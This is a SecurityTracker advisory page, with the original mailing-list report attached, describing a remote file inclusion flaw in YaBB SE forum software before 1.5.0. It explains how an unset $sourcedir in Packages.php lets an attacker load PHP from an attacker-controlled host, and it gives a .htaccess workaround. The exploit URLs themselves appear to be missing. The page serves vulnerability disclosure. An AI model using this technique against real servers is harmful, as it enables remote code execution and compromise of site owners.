Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Application (Forum/Board/Portal)  >   YaBB SE Vendors:
YaBB SE Forum Include Bug Allows Remote Users to Execute Arbitrary Code on the Server
SecurityTracker Alert ID:  1005973
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jan 23 2003
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): prior to 1.5.0
Description:   A vulnerability was reported in the YaBB SE forum software. A remote user can execute arbitrary code on the target server.

It is reported that the 'Packages.php' file includes the 'Packer.php' script located in the directory specified in the '$sourcedir' directory. A remote user can create a URL that defines this directory as being a remotely located server to cause the target server to include the remotely located 'Packer.php' file. A demonstration exploit URL that will cause the code contained in the 'Packer.php' file located on the 'http://[attacker]' server to be executed on the target server is provided:


The code will be executed with the privileges of the target web server.

The vendor has reportedly been notified.

Impact:   A remote user can execute arbitrary PHP code and shell commands on the target server with the privileges of the target web server.
Solution:   No vendor solution was available at the time of this entry.

The author of the report has indicated that, as a workaround, users of the Apache web server can create a '.htaccess' file in the '/Sources/' directory that contains a 'Deny from all' statement. This will reportedly prevent remote users from accessing the files in that directory to exploit this flaw.

Vendor URL: (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.

 Source Message Contents

Subject:  YabbSE Remote Code Execution Vulnerability

YabbSE Remote Code Execution Vulnerability ( By Mindwarper :: :: )

<------- ------->

Vendor Information:

Homepage :
Vendor : informed
Mailed advisory: 21/01/02
Vender Response : None

Affected Versions:

All versions prior to 1.5.0


YabbSE keeps all of it's function includes in a directory called "Sources" which
is not protected. Inside this directory a file called Packages.php exists. This
file is supposed to be included and not called directly, but if an attacker calls
it directly he/she may cause the script to run remote arbitrary code.
Bellow are a couple of the first lines in Packages.php:


global $adminplver;
$Packagesphpver="YaBB SE 1.4.1";

$safe_mode = ini_get("safe_mode");
$pacmanver = "1.4.1";




We can see here that the variable $sourcedir is never defined and therefore may be
defined through global injection.


where the attacker server has a file called Packer.php.
An attacker may execute remote code on the server with webserver permissions.

Side-note: An attacker may also use this file for XSS attack on the server.


Please check the vendor's website for new patches.

As a temporary solution, create a .htaccess file that contains 'Deny from all'.
Place it in the /Sources/ directory and that should block remote users from accessing it.


Hawkje, Truckle, Cyon, daemorhedron, Mithrandir

<------- ------->

Concerned about your privacy? Follow this link to get
FREE encrypted email: 

Big $$$ to be made with the HushMail Affiliate Program:


Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, LLC